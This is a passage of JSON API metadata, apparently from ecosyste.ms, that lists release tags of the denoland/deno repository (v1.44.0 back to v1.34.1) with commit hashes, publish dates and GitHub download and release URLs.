rl":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.0/manifests"},{"name":"v1.43.6","sha":"7df3d5aeec14f24e5fdec1e1e6f5739f1fbeebbe","kind":"commit","published_at":"2024-05-21T23:34:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.6","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.6/manifests"},{"name":"v1.43.5","sha":"a13c4531fd2c08617767cc8a0788b9e20ac27d45","kind":"commit","published_at":"2024-05-18T00:22:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.5/manifests"},{"name":"v1.43.4","sha":"d64921c1906ee1ac39230c16abe9ff8c546bd645","kind":"commit","published_at":"2024-05-16T23:28:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.4/manifests"},{"name":"v1.43.3","sha":"d6ad253882a6c066e0c673ff64e6554a37bb3487","kind":"commit","published_at":"2024-05-10T20:37:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.3/manifests"},{"name":"v1.43.2","sha":"acd75bbd75fdf46c213d7b21093e09349318da5d","kind":"commit","published_at":"2024-05-08T22:21:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.2/manifests"},{"name":"v1.43.1","sha":"5ff881a0737eccceed55a0ace3ef3110d5b72b2f","kind":"commit","published_at":"2024-05-01T06:46:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.1/manifests"},{"name":"v1.43.0","sha":"5ff881a0737eccceed55a0ace3ef3110d5b72b2f","kind":"commit","published_at":"2024-05-01T06:46:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.0/manifests"},{"name":"v1.42.4","sha":"7cb23c5e3ee0b6c416f4c0e34c7c63fdf5024138","kind":"commit","published_at":"2024-04-16T00:17:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.4/manifests"},{"name":"v1.42.3","sha":"a64a257024c9933d90494613ac6b302cc69df6fa","kind":"commit","published_at":"2024-04-12T00:54:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.3/manifests"},{"name":"v1.42.2","sha":"04c0a4cbf7c00811d3ace3184c1cb8597a0e88f1","kind":"commit","published_at":"2024-04-11T06:39:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.2/manifests"},{"name":"v1.42.1","sha":"08f0613b390b289d07c6ea165bed0518809b34e8","kind":"commit","published_at":"2024-04-01T06:33:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.1/manifests"},{"name":"v1.42.0","sha":"9c6eca1064de029e560377bef831e69d22c5c00b","kind":"commit","published_at":"2024-03-28T00:47:33.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.0/manifests"},{"name":"v1.41.3","sha":"0d7662e1556a60bcc4b7075752fb2c2842b1afea","kind":"commit","published_at":"2024-03-14T18:13:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.3/manifests"},{"name":"v1.41.2","sha":"6d062cf0c79158a8c0c8a136c945c3eab2af8b50","kind":"commit","published_at":"2024-03-08T07:32:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.2/manifests"},{"name":"v1.41.1","sha":"8ccb9e954548d1a4d3ccbe065c28d6067d3fda03","kind":"commit","published_at":"2024-03-01T00:25:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.1/manifests"},{"name":"v1.41.0","sha":"118445103b019fbeb50eadc8d09d450fa8c33eee","kind":"commit","published_at":"2024-02-22T01:44:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.0/manifests"},{"name":"v1.40.5","sha":"2c97831fec0d335a474c4a599a5df345a23ef036","kind":"commit","published_at":"2024-02-15T05:22:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.5/manifests"},{"name":"v1.40.4","sha":"49214d309fc373a80a02f57545131b15f7813a98","kind":"commit","published_at":"2024-02-08T11:05:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.4/manifests"},{"name":"v1.40.3","sha":"887fd59486325ad99c183955b35fec07fd45516c","kind":"commit","published_at":"2024-02-01T06:27:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.3/manifests"},{"name":"v1.40.2","sha":"9a55a72cf195b2d5cee1e8598c7d28e4b1e8013a","kind":"commit","published_at":"2024-01-26T16:36:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.2/manifests"},{"name":"v1.40.1","sha":"b003ecec64782ebe3aa7e5b17728df2e6a6e2e39","kind":"commit","published_at":"2024-01-25T15:22:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.1/manifests"},{"name":"v1.40.0","sha":"9e575a286269c38c1af0a918a2a4ea4639a3004b","kind":"commit","published_at":"2024-01-25T02:48:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.0/manifests"},{"name":"v1.39.4","sha":"be4d0b7ad306312b0c01e1abc345e54b4e589ab6","kind":"commit","published_at":"2024-01-13T23:52:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.4/manifests"},{"name":"v1.39.3","sha":"aa23ccd1ae3b0c188336c0fd1d84deaed5fe13af","kind":"commit","published_at":"2024-01-12T14:58:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.3/manifests"},{"name":"v1.39.2","sha":"6af25c0592af46781b63bd43cf12d39b8aa61d09","kind":"commit","published_at":"2024-01-04T20:40:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.2/manifests"},{"name":"v1.39.1","sha":"68254ddc2060c32e6daa55aa3b33f82739655705","kind":"commit","published_at":"2023-12-21T15:46:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.1/manifests"},{"name":"v1.39.0","sha":"5b96f7bf21392620f0047687ec3b75b25b7ea9f2","kind":"commit","published_at":"2023-12-13T21:52:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.0/manifests"},{"name":"v1.38.5","sha":"172e5f0a0cea97ba27f7f6e46fb8f9b31f8dbbc6","kind":"commit","published_at":"2023-12-05T22:37:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.5/manifests"},{"name":"v1.38.4","sha":"8c07f52a7cbd6117e968383c94fe25b91c4c9242","kind":"commit","published_at":"2023-11-30T19:12:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.4/manifests"},{"name":"v1.38.3","sha":"3193e93912f87dd05871abb61f54297368f3f265","kind":"commit","published_at":"2023-11-24T03:49:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.3/manifests"},{"name":"v1.38.2","sha":"118be11e8c64fd6c4afb352b5095c02fa5571e8e","kind":"commit","published_at":"2023-11-17T05:57:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.2/manifests"},{"name":"v1.38.1","sha":"0e7ad0388be7413db6ded8b60d5ae5d7cc0ffda0","kind":"commit","published_at":"2023-11-10T11:46:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.1/manifests"},{"name":"v1.38.0","sha":"41877a0b3735d52db8b4f5047b1d4d61e37ba585","kind":"commit","published_at":"2023-11-02T01:01:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.0/manifests"},{"name":"v1.37.2","sha":"7282994df4f9c1748affa7c4455eea46a9e1a2e0","kind":"commit","published_at":"2023-10-13T00:14:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.37.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.37.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.37.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.2/manifests"},{"name":"v1.37.1","sha":"72c276d61a8b43abd3dbcf4f1440a2bf133fe0d2","kind":"commit","published_at":"2023-09-27T06:24:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.37.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.37.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.37.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.1/manifests"},{"name":"v1.37.0","sha":"997aa604dfd50c0f0ec6fd4db16b5034d2cfd726","kind":"commit","published_at":"2023-09-19T20:29:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.37.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.0/manifests"},{"name":"v1.36.4","sha":"c0617d11f6391f1b1b3afffe0152c73b5989ab80","kind":"commit","published_at":"2023-09-01T14:15:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.4/manifests"},{"name":"v1.36.3","sha":"55029c72618323014aa49317de9124375adeb13f","kind":"commit","published_at":"2023-08-24T16:01:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.3/manifests"},{"name":"v1.36.2","sha":"a7f5244a72cc6c00949c02a180d0d9cdf2bf1672","kind":"commit","published_at":"2023-08-21T13:39:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.2/manifests"},{"name":"v1.36.1","sha":"9f1455b75087e9e41a995bbb6a8a7f3059a0185a","kind":"commit","published_at":"2023-08-10T10:53:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.1/manifests"},{"name":"v1.36.0","sha":"6ba245fe2570b29e35a4fd296a196a58870b1e3c","kind":"commit","published_at":"2023-08-03T16:26:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.0/manifests"},{"name":"v1.35.3","sha":"2e7254f2a60239603a2c6fea75cc71fbf6226470","kind":"commit","published_at":"2023-07-26T14:46:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.3/manifests"},{"name":"v1.35.2","sha":"60fe8aa5325345fc07c997b2dba169e45b87a863","kind":"commit","published_at":"2023-07-20T01:29:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.2/manifests"},{"name":"v1.35.1","sha":"b4824bf45f3d12e1b53e7eb5afcd49c38a575210","kind":"commit","published_at":"2023-07-12T21:49:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.1/manifests"},{"name":"v1.35.0","sha":"1ac5fddf54a828f1372e1ff10559d1a4bc70e5c9","kind":"commit","published_at":"2023-07-04T23:58:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.0/manifests"},{"name":"v1.34.3","sha":"ef24d1a0b7fb7f3297cbda1d80df6e1f72bef252","kind":"commit","published_at":"2023-06-15T22:16:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.3/manifests"},{"name":"v1.34.2","sha":"acf5d44a221b84e92bd0f6b1be5e6b08fcfb5a32","kind":"commit","published_at":"2023-06-09T00:13:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.2/manifests"},{"name":"v1.34.1","sha":"ea6cd3f1fccd5a621582788a4949d40d5fcdcd1b","kind":"commit","published_at":"2023-05-29T23:30:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.1","manifests_url":"https://repos.ecosy